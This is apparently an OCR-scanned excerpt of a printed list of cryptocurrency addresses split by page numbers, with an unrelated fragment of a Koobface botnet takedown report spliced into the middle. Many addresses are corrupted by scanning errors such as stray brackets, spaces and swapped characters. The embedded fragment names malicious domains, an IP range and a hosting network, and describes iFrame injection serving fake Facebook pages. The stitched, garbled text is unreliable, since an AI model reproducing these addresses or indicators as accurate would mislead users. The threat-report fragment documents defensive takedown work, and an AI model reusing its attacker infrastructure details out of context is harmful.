LCthM5bHMNr94QDeJYmN3KXoQw5uCx5uSu 
LCTKANg2He45bRz709kTLX8sVATgq5Jc59 
LCTM19Ri6f47VqqD5JA8L2vétytttHejqq 
1ctojjgaXozZekr8u9yAAdbsHUF4TJW4r 
1Ctoy6jm1JTUuGaoyiwy5R9YXsfEKdJKSRX 
1CTpzWdXDHcddF7XmFWJL42vugD8edrpkr 
LCTQPIK1T7JHbfgGRbYYpmxABWSpiV6hwu 
LCtQwhP4TGW1n7rWo83TYG47QXuKdpYovv 
1CTrjf9sxgdwDdt3HBemji8a9cEirxWYXZ 
1CTTRZ6LcL3aWGPXTARTJy6GppqF4RwxL4 
1CtV2Waxtedunzz4LVax5zmyCAVt4MerKL 
LCTVByPSxwHMrkaDgXqLao7bNRzcm435cc 
1CtVmw2QS91yDXUtARJgPNgJDJFaZBXSUS 


25499 


1CTVUQ8PU9smJQhbfeZfziYSqQwYrjJSaaA 
LCtW5TiHtUEdABMJdTMsJZqp4KejWBviUx 
1LCTxr9PmMZWMzwynhDQma2SBZuYbDDG5k9M 
LCTYbenAEMNBzfH4Bd1EwbcKrPwS89nCuk 
1CtyyY9EeFsZpaG lJobPpTpyzizDz4YpJ3 
1CTZkejQ8rRNyybNuuLfUq8GykNk7L8BNL 
1CtZQuTMafisLHMnkn21ijK92TLCQxGwaqu 
1Cu3A7pu48TML1uaFjzAfTpjBtLFiycmWM 
1CU4DszU5ELVk4VN9BLgfENL83AKUGAPpK 
1CU7Yc9S8h5WJkbiPKKpxcLFEfySBPa8Fw 
1CuAc4bVDximzmh1VXyYnLikMhzcGSjGLN 
1CUAra1ldXGNPv4SwpVxJ1TF6aDbB7K8kqk 
LCUAYPiXuLZXi7DNBnoZ7wQEBTROYP6HKo 
1CubJHTjoitAFzCz9ShXTgBLqRUXMTuwnD 
LCUBRUF4Gvk4wH2QphxYjWQeqTHyKdmDm6 
LCUbTfxgkVLSYBVW67KdUX7xXJBDb1pNjJr 
1CUdvDg7sy52f7yW4BSWZA6afJLG7Vzqpp 
1CUeCiNyEbnV8Lf1jWd7BQHMnmUEH8R552 
LCUEL8MVWapQC4HEhXe42EybNPT5gMcA8c 
1CUhsptbQZHzzmbrNpJKv4bnEXh9mPLG8e 
LCUHZk4rY1YYFByCm3YiGPpwf68wWvgaxj 
1CuJ11U8J6LNCq7bzkW6D)]xWgE9ZeviSV5 
1CujhvoTGMCXKsR8vnfECcYBhwP9K4vASv 
1CuMCvnEGw8x55gww4V6P1JHk9JGSwGafS 
1CuMuLRpEAddm5mhpz4BfGsqpla6Tr5kyYt 
LCUMYXP4aELhVAYBErpKMakViN6v2ZJytv 
1CunvNvdr6NFFKsD4yAmvLdF9NixAeug8 
1CuQruYyLNqriYn2Pem6xfZafvPWRIEkkm 
1CuRGSdJKxrkew1RfD6rro5b5KUNt5 RoKP 
LCUT75MKmfAnT9ZMMBwWWZNYjvyBGAZztKd 
LCUU8foLWDZYLJyfojRfvvS15ZSm3jHVLm 
1Cuyfv8XW46WbAkKFQr4JmV6BHEMusbeo3 
1CuYHGqGAaKUr7 1NtEC3FS7fXqWePpHbKZ 
1CUzZ3eB64vabGoG20y8P9x4Tq3myMRojUz 
1Cv13BUEkVzodfteVVMPnNHvcTmFuWVVWC 
25500 


1CV3VHHF53mwMMbrKGXUz3Zq5VNQ4NkawE 
LCVONCINQ90YShpWKZQtWfemQkZfE8U0QC 
1CvBKyYzxCrABkDncEGjoKwjqnwDLuPMxV 
LCvcVnELmnNwCfRvbfsche9pAQqNkdbEiz 
1CVGZH8x42SP9ah5FcKP1sf25uxvMCEgsKkK 
LCvHBCckzCDUkLo7rasXw47AGjfqlyCxW3 
1CVJGWmFrhiG5a6UoyAvuTgFRVXtQhkzos 
1CvJVyGKS1ACu2dZA17FK3xDkgVnr5KL5m 
1CVLKcRolHedsGRW8J8aMLX3RjgCH3jp1S 
1CVNJCuUS2cn5234m5W8o0MSucc3ulRos9s 
1CVPakpYgJyvE3yTZds3ru3Tppt8mMbixh 
1CVRekeicYSaUnAF5VsLZQ9mbxkEUWjGYA 
1CVRuDRZJHhJvf5dzED6rrCNqFJdhdXcxF 
1CvS9c747PoVjASeU4qhNVEmhdE1Vqws8H 
LCVsFR7sej9GQmg8NUJhtw2PtlvX89PAx1 
1CvSsjSQpEYBgXXimRdEHpaTzXkC7kQZ]W 
1CVsxiCdNqHqKhkRzDk3dRsXxVEQzbkq39 
1CvTCD99XDH1gMfyQz7tFGbbjbDSsPPFBA 
1CVTe2kYMBRJfKVVKjd2nHtdP6qWecShqz 
1CvWv4qynhKRnppHf6éskDZBBW6qz9Tr84E 
1CVwxP4b4wy7Zv8hJql1B2EeTnwHv8WCRJr 
1Cvxchs5ubK5D8TY55q7y9pX5ctqxhyZeH 
1CvxKnJJZUQW3YoCB2ZR2DxajUcMfEt4p 
LCvYk6y2gvLT QPiZXM3VLZZL9DfCZAbpix 
1CvZEoAkKF7W5fkKXnzDTmc7DFJxXBM4Wu6H 
1Cw2Pb9B2WsbdBekrxrGMPBLa8u2vh9kh] 
LCW3W2zbGCz29E2pfiefmfeHeDjFyha6Efh 
1Cw6zrRRQ3JN7GhXUKsQXSDsCmLq8vUvTW 
1CW7x6UGJc1P2rCFDs9v3m2KTZugXKy9D2 
1CwCGJNdzhSrxXdKEJkaJdMy47setkUTRxS 
LCWeRQCAFPZNk2rijt6k LkngzFqdiNcdFe 
1CweVXDakxpJMC61GVsyF3RXS6z2EFKEry 
1CWfgUz1S90cCYTYwdvIcAWTCuc9iE7hzn 
1LCwGV9YfE6pQGjS9Mu2bPTgCYMZYbsERq5 
1Cwhwd7mosDJ9RTXfinkALLWvuoxm7ercF 


25501 


LCWJAGUxpZN78aWBBjTrEFb8E3y6W1nA5b 
LCWjfmKnsrZairx9wobhVn911pbWTyxuBE 
LCWjg28b1GftK7KSeJEFjwripoeLMVztb2 
1CwjLiYiDe3xmo718zyEEDwrzDwgtQito 
LCWKJ 7LJ8XVtWc4Squ8ndxxKXDLnTztSha 
1CWku1b6ZUF4WPH1f7q5PQ6k6pEEV6tYiw 
LCWLnDpf2agd94Gy63jUmMXxvAUWD4VbmxXv 
LCWmhR28njJonYuCuc9qddaM5nPA5ZDG8ke 
LCWMhsioM8tp5YmmrAWYpHi2fXM41CZTKg 
LCwmrbfyrX32KrCEF376zwodvQNvCysmQp 
1CwmyV6aFCEHfotgdExbb1BCvhedX37dmg 
L1CwnC5ocwGV7GsmAU86k2Vkk1iWap8konkK 
1Cwos2RRXzcuvTZKURSWK77hrqexLxMgcQ 
1Cwp9U19NVd0267RfGOCFVq2FdiHTd1Vuk 
1CwqtL3RPA9d9XLWLXbttBZos90bQVpFyd 
1CwSJR7ATKCDbnxXtkeT56jMyrCbAUVarsNL 
1CwsoJNVUaVJtundLArHCZeBA1xzt8bQVP 
LCWtC6jL3HHQXJhJTxkXbmPYr978brY7Za 
LCWthSpRG2rufeTWpj3xrir3fE5NrRTpdY 
1CWUf4VCPaZczca445ASmgzbrBzSe4ouDn 
1CwukpHYiSyRHBBtxy3vEbPeoayflFyZG2 
LCwVZQEQ83o0PVizpuMwiY XHpujRzZ5y2MH 
1LCwWKLmn95veffPmUzCztgnrmbx81UKLNn 
1CwxcDazTJk7h1BJwpABMLBqVajxCrP41c 
1CwxzeouuJh2ABnpVqR93FQXwmeT}T BhcGA5 
1CwyAeikhagDmJmP4zbffd8mniQoK4jV5R 
LCWYVWN34toVmWxYRVU2ngGQiYs9takB8a 
1CwzPk39svH3Y3WQ2x8ZrMqLZqGGpPixuD 
1Cx 1IMWAQUoWgoBAnnMasLSsTzajLPSzmDV 
1CX4nPqtrvUuKuZkkUurHyCoup5 TaRek4g 
1Cx5J784iAbAecxMUy8CsmCMfyZkFus66S 
LCX5v9MBvLuTWgQji4Sj/YxaQ2MiBxnk7dy 
1Cx6VCrRYoaHu97cQySJi3j3eRruFSYw3g 
1Cx8r857EvzSs32e9TTWiIcrHyQFqMgLpKd 
1Cx9N1p8AUhqJLDFreHhPwVvjtokSUni1b8 
25502 


boomer-110809.com 


piupiu-110809.com 


221.5.72.0/21 ——AS-pe AS17816 
$uzl11082009.com 


upr0306.com 


UPDATE2: The gang has responded to the take down activities, by using the only IP that wasn’t 
shut down 221.5.74.46, with piupiu-110809 .com, upr200908013 .com, and upr200908013 
:com already moved there. 


Interestingly, now that the gang’s centralized domains used in the majority of campaigns 
are not responding thanks the quick reaction of BlueConnex, they’ve started embedding 
up to 15 iFrames directly loading IPs from the Koobface botnet. The script is detected as 
Trojan-Clicker.HTML.IFrame.a. The pattern? Each and every host is serving the fake Facebook 
page from a similar directory - /Ox3E8/. 221.5.74.46 is in a process of getting shut down. 


text/html 
text/html 
text/html 
text/html 


text/html 


UPDATE: Three hours after notification, Blue Square Data Group Services Limited ensures 
that "the customer has been disconnected permanently". It’s a fact. All of Koobface worm’s 
campaigns currently redirect to nowhere. Let’s see for how long. 


2553 


1CxA5zC68t6nKnpApLjk1u47z7hh9ATNpd 
1CxCaMsYPqYgKcfDhsauHSMn6Dfn2t5U1S 
1Cxd5yazSQeAAb3apBKCXmymJoNDivWoib 
1CXduSNN2xCjr7f5X4YdexE18UUvFSdCDF 
1cXEphflnyBVCeoUhJfTsCaUyhicF28CN 
1CXfmb7PwVyLBmsJRdhBo4tNRNixh2aiTq 
1CxFqHNb18c6LDVXikhnmikGgWNusutKea 
1CXGtNp2xxeNe2JaQme4WAtWchGBrFWr)j 
1CxHPQfAbzMbXLvrewzyJS1d2j1qQ3Man3 
1CXj9Q56FTbEoKqu5kUVkvZkGfWp1LiLrbH 
1CXjFDSJKjawXym6NpbmfQd4rhjiaHvZAW 
1Cxmu6Z7khVrjlssim5hxU3cAusV8Ed7WA 
1CXnvTrrhhS4GEiLCPFy2DALVxeVeEAfrc 
1CxoFuHttzXkbkJks3QM3znxk7anYKLViS 
1CXPjF9yaJiUgQvVXHZrYNAFJR9VnNOkWntx 
1CXPPhRR2io8P8LACGXnB8LyWya3HmCq1K 
1CxQg4jdqQjlmixiorDdvox1nR3g4QKchy 
1CXRFf1dBQ2dxR4dLG5AL2U8xpZziE1ZfZ 
1CXrMXhrjXpb6uC7woND9To3xzUV 7MpMxc 
1CxS3104qhUr4cw9vUEfePMhD2jnkKP3Hrr 
1CxsUVohKA5k8gYbRa3Ye6Yk94jvX Dvfab 
1CxSXxwKBaSHXbykjKaVSmwpYEX9i3EFHm 
1CxttLwAroThzt5b5SMnrNRRVXMvtjjezx 
1CxwgqJqD8JwuXrpa8UFr7gH15qzjwW8EB 


1Cy1lmnYujPh5vs8hGGN3RZmSkSWpEu7ARm 


1Cy36zVf3g9rgCsGbvxNJbRWP5ZHZKskkKi 
1Cy3bqrEQQtK7sPSayCemo4H8faJT1Acxu 
Icy4FEGNKONYPvy72YsYDfMUajByP7RGA 
1CY68wXpbWXWeParSbCDf7Jey5rdK14YRG 
LCY7MnqvedYX5z93qk2HrPAM 7ujMrRwqxa 
1Cy8AbHKMZWTBSJJhJtnUCXrvdfV9wCjcD 
1Cy8e4DE9vacwaRepGckKtukf42WjQvfSGW 
1LCYaHhBoYy8kSJw3QfY67xXc4AWudojdbeh 
1CybbKBea3HM83rNpYXPY2XpXYBGfJMZTu 
1CycofSwhCBfgZsKFpPy9Ad7gBfeHp/cqc 


25503 


1CYebAuPt6rhdY1zwhyiMGtxcP21NiyJb7 
LCYELpw1i1NN3vN4PChEm6P3mCpCK6pjgBx4 
1CyfTrDqcjYo2u72p)KicLtJejfUGBZuUQ9 
1CyfuKrNrxXDRc9dVg9TIJkTZgn3weY434g7 
1LCYH6SjutkwJ1K6fhZLa2Bt)VZ7ydp4VsXx 
1CyJvaZ7d1menoTpx3BuLRXhNUV6Vt17hZ 
LCYLjtl TmmwLrWxvkCqcFNgFuzyUMnzWBn 
LCyMTAgqjJHPDpJ9NJBozc5qsqUNZUYbt)x 
LCYNEjuKgeGpyC5df56UnHKUcv3CrDPFrE 
1CynqCoJYaLX]pS7gchCFNBb4ATK4Wj7uG 
1CYSGgJaDy5nh97n32W3TCLCnNVQ4wCNPJL 
1CystLT5BHtWTEZkoHgUFmYJK2eweZ2wijd 
1CYswnC341M4SJ25qCP9pEXs80eNxSuukr 
1CYTw5yVgDSiJ6JxCowhRQsUn1zYRxjP1h 
LCyUFFxw73WTiQsQ9zxmWZfb2GFH58JkWn 
1CyUQwRoCiWkFWBM2LeG1BA1BBqv1vo4g4 
LCYWXL1ZNZKnhRdgRxcvdpUWTs7otM263a 
1CYXX4goRdHeSsnUyH158aKkuk5XrdSt3iZ 
1CYydGvQdBBaJXFKHyeguWrQV9DmV4DvLh 
1CyzsdG646Nckj3ZeaLx7PQQLVLr8pUVQX 
1Cz230VFxqHsVNVFfsUG1j5GzZuzYjRv9p 
1CZ6eFgvX2e7VwjJVLUcgBeeZn62nbhmkAP 
1CZ8ct9J6Wdzb3XwnikcVqtAjCnsd5ostB 
1cz8pH571lyyW5YydP9wZcCLRYmLh38erd 
1CZAMLFzehUxUuDaE6FbkaftkDj6Umgikz 
1CzCdZtdFjR5BFMjq)X1C30H3FyDMBtbjn 
1CzZDQ7CVhCdHU8DAXvcu7xCTiAJ4px9ESi 
1CzfiBkQtbN4LMfria9RoEXueofF2uNkj8 
1CzjSgQL3xChbU8EaoZe21YKXpMNqBwki4 
1CZKRLZZXpGETrtxFK4HtFcMaZDBd4Wsw)J 
1CZLygsKhaQqozcF742hQLUbWg58kUhTnW 
1CZmgUdZv4kxqekKf505 7Ed3MUze4RJ4kD9 
1CZrb1wdzqxkrL6RRebf4R24Z9PMZVDFW5 
1CzRvbieMNvy9iLfFvwqG6AzZya5txPpBw 
1CZRZGTAL8qkM37LZgbSeTM8o0AovjWo2Nz 
25504 


1CZTasRY8p159nrfFGDfKa9gJVp1tVmjYB 
1Czw6Ksfazz3LMZJ4tUjSTZ2xqmUh8LSiK 
1CZwR8db6GzahBmxkoet96dsTaWY64GFUU 
1CZxJPKBTD2N3fluFhR9WeSUfHXEq5zLqY 
1Czy20hBS9WTc9M81McZ8ktbm2qr8wN406 
1CZZ16XYrcfmBMWx4Rh2Jb6ZwcUAMpPdsC 
1d18cpasgcrK3hAhKfaZvMKZAUcCBG43kKj 
1D1aEQ9B2rhy1L7qLi2EDoDmDDsaqBpsr5c 
1DlaQgy3rGYm8JeY2rTpzMZW3YV61WsDDB 
1D1DakdV3WvcsSGdVFnFwzjPacjhuQkzVT 
1D1G1rZEzmL8uf8ihu6fxXqbUg1 TarR2CPK 
1D1gb13hi32HNC65iau93BmvmRDm9YeT13H 
1D1HSGHoSP1XVa6kvVGoDpoxCXgmAtXMUy 
1D1jL94CkikkYsYFkpX1dNz6eSSfhjFSEa 
1D1oN5UQ9jDXtvh13cKQB4jsf7ua8vFGJP 
1D1pgn7XAMQiFbxRCwtuXu9hjqrg7fHWEH 
1D1S1Keix4r34ZezpWe2k6MLCjab2bj1p8 
1D1thaE6QbS85Nnk9S2i4ntyYDoeqAMG6A 
1D1X7UJfzvTw5afQDtMrRG2dMErRV6Lk80 
1D1y4xjD3aQdPNKXVkcGv5kfZdGJAo8gd5 
1D22PdZXEZoAHqV4DJnXUtZiF5dRBDHgYG 
1D23rboPS7PeKoDtuDRvsxE44vokuFRbVD 
1D28U5eFq9dGdPoUe5yKWjvNqszvPFhBdx 
1D29shaCTiLPk4Sb2eP96YAQfU9XxiAEtQ 
1D2aSPouHNXPRMKfsfWgdqNoAzWLGVUXHP 
1D2b1dojvx7JJ6uUzZHpkihgf]JzYTApoLm 
1D2fVowdMbj8FP9saemoqXuMjF3Zmx6gSh 
1D2jxYwEqyxEKXonhZarvGMPjY1SrjAmsz 
1D2N4jE7jV42sVEJmnQb35MeyNVK9QixWe 
1D2Pr5Cfhql1CEgCKQYX8y9KknwSi4PRWpX 
1D2qNUcWHZcFkb2o0P]CKrgxbUQYHdJF96d 
1D2t29dKBinSKfA93FYBoa6MYQTndCGbnu 
1D2XNanKN7o060Cwnuah9gH4YZ5ru7D7vm 
1D2zxz8fRt3ZF9OXxVLI92tuINRWweGpxVbA 
1D338GtDBkcMoHgLSaBpbH55QU715yRdXB 


25505 


1D3b05z51dkcjqL956KRgSGpWGgLSkJiQV 
1D3f3ZFGCIRFTGVUNh7nwshyXGpYmn1YLd 
1D3fy5D9KMEDX57bo9VtdTsAQZf92Z96Et 
1D3Gs3gtnVnw7NPgsYGV6pQ3eLP952YWLY 
1D3gtAt8GdYnqGRpTUEb8CvmidGuMx8ry3 
1D3gyLSZwNpaMYBgbZd9V]VQo0A82SnXCX] 
1D3Lx3izvFjR78BJBBwtRbC2dnu9Rpinu9 
1D3sqsTQ9QUOHYnU618mjJNE1ldw2RWP1Sdn 
1D3tx33CPHuJRLOWAScYjgEwr5V1fTTIN8 
1D3tY6ijN8tvC6EIdY3ZTbgceAzpwpUdik 
1D3weeL3X4A2SqaKFBrgAHbu6L4zCYwRFL 
LD3WhCdYGzZ1GZ3VL7yLaqPLZidMTB444Ex 
1D3WXPb3RrqfuUqsyWZQ2vdXeQDqUpHEZzi 
1D3y645yFRxFNtJY2uTpCEdMaZbZ1tRMUY 
1D49Lb2P2GkKRTa9DcbDh71ioP2MoUxiN4 
LD4AHKpP69AFjUuvhRzupcGjFyxVG4iAsV 
1D4B4ilvcsASqZsSSpYQgRHZs7AkV6PN6z 
1D4JBfoSTocZp1Gjsc91SuqG2UkRm7ZaXD 
1D408PPAvTjUN361FVQM2d5tLEKQiRAINE 
1D4QNk2bRM6NHZ9PTitLWwMbQYPgX3qQEHW 
1D4tbQUDrkwSVAE6F lubipmz9QeZFfu3je 
1D4Tx3TBLyjmfvoxDbpd9uGbyw2h1GULvq 
1D4uV4iJyJMnXGTZHa7LQS1w2u6XVqdwhZ 
1D4V2meoTEUucWrbRnGitV2pX3xEXJoex7 
1D4VCQrANs5zW3y6HrnwtLZfCRYr52yiwd 
1D4xyEK41zP4FqcvqCfuLATK99ReUHLHa 
1D4yvLhuhWZMnipyJUVR83phj9ie5paxZc 
1D4ZH97gk9QFSp5CPNZHOE5QM3F9r4VXyz 
1D57jKpzYYMcLouhRc25JVf9Vz5ihaZuhe 
LD5AVEMX3iQhn5eC1zfiz3hdfzpSxqCFUU 
1D5CRRyGQAozqCCuDzE34KUDUooYePAJCP 
LD5fHYTc4bB2vSKSjBuhh264uimgCJbP1T 
1D5moQsTv7TD9Yj7iLiICMZtr9VPaxyo423y 
1D5NxztvrVSSBA5Yc9RCZJWQYJ5MgC7N8z 
1D5urLWBQVpPUaeQfR6HoumOQrtFY 7agf1x 
25506 


1LD5VXfAZr7bHZq8yHbLKyYAuobfroxFFn2 
1D5wcpzDcMJgBzpjLAfixDVo6qEwmYTUQp 
1D5Xw1lgocXGTinQ9Ge1lFH2kkKWQFCUvd33s 
1D648snwLuSVdYM4qbxABw5szAMHHhMaEw 
1D6B8CdxgiSVNy3fWdvYdhQAyNc9H5Yfwa 
1D6DT To4NEa6vyr7dRI pWjvCWakKrowUu4P 
1D6f8nHtt2nztvnJZgp8TPpgUdVEjm541x 
1D6gwc8redywCwkKMhMcRk5GxemQ1bjJSTM 
1D6JsJ)WtGMWHGGgd2HpYCra8s2hmGZQmwM 
1D6niqY4nbkQ1Kr9Ymwa3M4yNDuUFc5cUJ 
1D60LD1EYtzq3LUKSRos5S56y3dYBmtjPN 
1D6PpghkpKGWaV6qKt9ucUJgGiCnjPJZXT 
1D6sAM9xokPYp5kM6rb4agE83No9iY5GGz 
LD6OT1IVjJHNNUgVdjsjNXUq92ucGtQtHRKem 
1D6US2z25ZA8j4KHEWzWnunUWdaPL9T gLbDf 
1D6WaNxUfMc4vcJXSBbomJrAz6Z6NaQafp 
1D6wCvZCw7mHbE5UyQWUaQGrmvjJAKio3NS 
1D6wemR3SW27M6wol4Bv3cp8GSfK6QMK4a 
1D75qkESMdJqTUifz9ELrmPZNRAUHAfysj 
1D7i2SgRkbfeWHg9eReEKX1A3ZM44WK2APX 
1D7JjqphzhXuA9TSZDrvwougUBBg58Gkq8 
1D7LgmgZB5iQMFTyF2ddwTLb6WWynb4xM1 
1D7n9qB8fqgEHcGKPUwwgbxhjRdzGG4TEV1 
1D7pMXuVUJgqd64Z2r1lnvoF1l3pvTQN5iMxU 
1D7Q25tqZ3Dk8gNhUD9ZnU6YosVQpvst94 
1D7tdqCNU8LYTZGdWdv62NYzZFZ86xc8WBy 
1D7VNzikruWZ3GGzPfHVgc3CRshPmF7xTa 
1D7ZFS5nCm1H8nRx6gCFaQiwVEn5UgrE2 
1D7zhjT7wwYCCSnfbhFR4R61SDEzYiB2uQ 
1D8AN5je5AvEJ7mGsFACHiCRAqMuVYMBSx 
1D8CsiUSj4E2YwMzxDpUteZQiVCDWrTghe 
1D8E1ZY655EeyWpqZmCVQnDhi1tjxKMDZVH 
1D8envXudrap4pUfeW] 7CE9ezjEjT953n5 
1D8gWyZtEntwob5 1qhbbG7F9tbcd4WsQME 
1D8imMUbWA6HMJ3raxqnyQfS8tmeFAD2aAV 


25507 


1D8JtDPu57 7tUfKlyUoyuma8bA7eF2SaZq 
1D8KQAAiAr4mbhrLDgZCiEixFYVACHMHB8 
1D8ptJsg7XXZRBT8QHcLq9qXyd7rrosYGa 
1D8QmW1svMCMUsFrPtm3B9gtU8qYrmAmyK 
1D8qnN27jwnZiF4sKnrmvle4pKggYL3U7 
1D8RNBeuk3ambBV2cBjigWmWLD3tgJSwU 
1D8uQsiYsFzFujt9fivxGSEDL5CHTQNbM9 
1D8Vc5et3tM6HMaSLjJLnK6EZUERYa64zR) 
1D8vWFa9VELAXvM2vao0GXZeb3JebX4A5hn 
1D92MvKRdAYegHREcpYktE9P6syMXof4SB 
1D95nEsxGa5J5042k9dsa8Z475NmALtaQD 
1D97NWsaiVBCxS7o0gk200gGyEbiLQRsqHw 
1D9876LytE8DgrdFMWV6E4hJJzF1xXTocT 
1D99iqdcYJt8&WrgeRaaCmK694DADMsPTIV 
1D9AgY73H7kDpon6ppBWLnVmuukGs7cM2k 
1D9eJs9XqfamvHelHRaoNigcA5kV4n7V2} 
1D9i8zepKfAvvaEFmPEdtVD24nFhPcWnRM 
1D9JyPRHvyp5VR2nqnygBoPYBiBC5F5wBs 
1D9m8aAevTinFDRjJmMM2dBMAUDyJJA7USNJ 
1D90fKpRd5p02239aG8aGwr21v5aiph46s 
1LD9OPUEPb9XUpb6v34RCLLB22j68tjqyuByb 
1D9sdWrZ2nEHwsZVwuGbTb2rLMkamsy14Y 
1D9tU5bkzsV3HS1ThWLK4X4MkkRNyqdnHTN 
1D9Unb2CX3Ae87z0UZYDR4Z9ibq725iKZh 
1D9XkbBVg55YVCqzVGUMHsrygVpsc2DxjC 
1D9y2LLMBL3WSirEsLQcvxLMDjFtinPu8H 
1D9yMGDHyg1FNHZGxNkNQSoBhD4QxHGmyD 
1D9zqfbxjZdQx9xL5Bo2nDyJTL6E5UhK2us 
1DA1aQfTd1leLuUTWUGnNNjjC93MERUWR2Px 
1LDA1LgyQNpCRM1292nV3xY53tkDzej7SgZ4 
1Da2nB1r5sUMUGJGTyAW4xq1nECnHU1bLT 
1DA74dTr1B4gE9cuPT6g2rgCwDDPxal5a7 
1DaA8BjQDPKTm3yQynRYiwnBHmMZCRhBHU 
1DAdgc9Yw1n87rZELQrqBvAvRC2WmiJn9c 
1DaDU636WkCz5YKXqzEr16p2BYdHJRMnL9 
25508 


1DAeUa9K2unQzQP1zaGeuQbewV8spScf3r 
1DaEYxCaM7SNWzkEvFTdVGBwcw31Sh57Es 
1DAGDbgeztgX7r69xhY9mMBCxMAH69xe3La 
1LDAJnlhvRWkgqM6k78VVQpHTjzPYMK2aie 
1DaM8HRNrsPcU1LKThNqRaWUGrcfE1lTzbdW 
1DamdRozkMgNP5nWGJjeMvvwRxjWTFWbvoF 
1DAn81laL2tMnyjdz5fay5F7uYVdZx424G2 
1DAoPkSqZUj30TdgKdFqA7at4JoF3QgaeY 
LDAQb1bxJfDVt7tTnzPa41EJdxffpxZzN8 
1Dar1hHZgMDcMrpX818n3HFKTiebMCUdCT 
1DaWBJ41ffpBPC7T9RFF4QfMH8teML21Hf 
1DAx5QzdBNgqLGYVwSbeHjqkswmMa5gxP9q 
1DAXvt6enkAzREa3ZJ2qHfC5n1F1lbScjJVY 
1DaYkjkxxMVzqe16CxjPSeFmAsUsbSNCDD 
1Db1kEt3rm4cRCW27s1CZg3sqFKt53iGoZ 
1Db2mMRQRV37WEFEKnNRRQuadX9YJsT16bw 
1Db3CHVVVj1LDLKJT93dkGjjdPANRmacuc 
1Db5cGEpAtSH1AyK6eKoyfDhkJroy1YjkKN 
1LDb6EibVmMRMCWdYyquS1KjTJ4S4DNqEEfo 
1DB7mnSmjJaLMr2hFgRZnVQZc70HGj2XeuP 
1DbatCUhySaa7SZtYrzGxQ5QCzcVJsuDCN 
1DBaUYibaw7aqD9g2XJa8Ye3JwHAZNXD8v 
1DBB4HUjyTF6BSRah7aNK1ZrdT1xNW2jJWd 
LDBC9MiqykZTbbEy4NYnDBbXPMXrC6JxkY 
1DbDBeo6n4MCMgU8ZZmSH9IZJ9iXJ9EQawE 
LDbESkrMybXT 7uqWcavGsJ7Jk49q4Psbem 
LDBhpSnRC13QHfo7ZD3LUWC6QW1361sqw3 
LDbiFLWHhcJKxZ4uspqkPiCEnZqCfn3]J7 
1LDBLdigDc4b88ih4pyLByEB6v2qCUTyii4 
1DBM8c3nw3o0rn1XFsnGYzPnQoGWvvz60UX 
1Dbo8TdBobq5m7GTHNNBDFZLA8Xz6isu81 
1DboHuU4xt31xYyUBucfaU9EripoTcDzon 
LDbpAAbScRJT5UfjF3EPS7ivzsGutwZxnF 
1DBpNZPC36KfQCS768maE9stgCwcQikK4Zv 
LDBqPWfZM78nHvjyxL20f1VbDVT2qQpi5f 


25509 


1DbQzy]JpzbBgoDzJE7Mj5WYLWJf8GMACIL 
1LDBrgUoLoAohgRTL4zqw/7y77aZhskKuRR64 
1Dbs7qi5BKbfQSfVsZGGneouiDGMkKfKejt 
1DBSRad2zK8nCRB6u2THKHLloaYjJadinWi 
1DBU7m8z2KTp8cAB3MTpE4bHaFYAC1dwRH 
1DBueqFqBFo5M3A7XZ8LtBxBUny1S2Hf7C 
1DBV2n04eXHSuLQPecXg3aC4uyi8NMfinS 
LDbye9qtw4dcGmt3nPUAM8WhNN87RY1hdN 
1DbzBFo6g7Kmim9Sf6CELks3q3GL7RYHis 
1DBZdT4CgqAAGqb8u81D3f783qVW71u2wl 
1DC204rzGsKGBi1Qw9nVENrr4GWRzjjD5U 
1Dc4HUBsSRQ5S5GfdRLfonlgGCiyBEDNUG 
1DCAK8C8BJwZPiIRL20oWarHA2etDm3P]fs9 
LDCBfgxTMW2qkdyPJbJyHBKCNU9bs2JGHn 
1DcCFq3n5ptvxZpCD485sHX2EJmpCBK3Ds 
1DcCM7i7X13D8ibcAQurDFgSubqbGKs2UE 
1DcFC3D32wAZnaytxrboh2wnk3eRsT2uhA 
1DcFJFUeYa5GGg2DUX7eqY22eeSzdNxxUK 
LDChB4SWoRw/7T IwrLVpWCuHfs9FFJcX7pA 
1DChfhrY¥keGE3rMfZLYK7 9yTH4Ef9waqfD 
1DcjzUwVKh7LfgU7dLMPar5r7e1qB8MP2U 
1DCL53MZ3XLsc6moSzyccYjijV2DkV8Zy2 
1DCLCd5ZRXvptHavMXxYModkHp6iD1iLiv 
1DcLvezg9jt9dzVoTmcp4kZHtLAShnpjzb 
LDcQmYUf9GYwm8BAJuBpzCi3RS46MDToHQz 
1DcQsuJekmVKdRU6ip996XkuSGymEdwxm1 
1DcqzUGS7UEWhaBrPYp1jR3T2WkB6NtVgM 
LDcRNQ5h8ijgSpk92hMCdGBuSF7aT16yh1 
1DCSQUf9PgB8ne51h8YLP67yTDSNHVMWd6 
1DcSRu9pENcpLcGn1SbbyrPaJCgkUevUJ9 
LDctLQZhW3YVjBSf3ZkJRxVK4ah7we2cav 
1LDCuNWkHuvQe2ACryKrXxsLp3UT3PiZwx] 
1DCv9RXyixKc7 UGBBkr4BrHaYSVTm2YheM 
1DCVEugh6ouprpjJ4gfRbDdLR6WC32Az6jS 
1DCvw8sDpua4d7xPyUAtgxReswGBB75S5X 
25510 


LDcvYHpZTSrkibxTu6JkUvgxXV4cunHyrbA 
1DcW50K757zxzEfY QKgX3X3w5FVyoxc94b 
1DCXU8tDD34YjYsxX2tdgvQhXiWoRF7cbuP 
1DcY6kNXd3Cp9P2bj2HdzST68LvcuDNorA 
1DCyZLjUbSCdWpaJqhx1pQhcPpz8CSA41T 
1DCzZ540WgDNBQZRNRaqYiwXkveh2mU4nDd7 
1DD2mFQh9dgjuBMXBErmxXr8gTRsyy2PcWp 
1Dd7ZrNfT87eJDfFX7G7SEQjkPrW 7ucfvF 
1DDBJwyQduP17u3MtXNL1EsK7MyP9RL9ij 
1DdeE1la5UuFtwhrE50ZXVGKeaCc92gLBM 
1DDeWpu7NGcKfH1uE7bZpevr4NCt8Crbd3 
1DdFfUseRfcunC74VtgAm65crGBwgh9T2P 
1DDg2Zv4rm2tDUG6KHiUjwCMVprfQnuiNm 
1DdgW3aafjBEYFNF2tFfZeiFrqhYbjsbh3 
LDDhCBmamNGZ5o0VpnucwjbQrY2gHLaXzbb 
1DDhcNkZtWpnhxfvCwV5c6QGk1EmahZWPu 
1Ddj3E3iy1CVRakpP495ZLHU5GhLHNtByG 
1DDL4hv1iciDqpxJZRsifFcEZYeuoZGXs2i 
LDDoRBfPMrCQ8E5rv6UqL8DJLNAzuBurJ6 
1DDTxagFP2kcrWXUciW6ABFdAzsUgQgmxXj 
1DDuCpbDvTyAQwjxtQbjTUeRf7UtLmuRKg 
1DdUEcgne5dsV9aUnjXMr9EB3frUMgSZEZ 
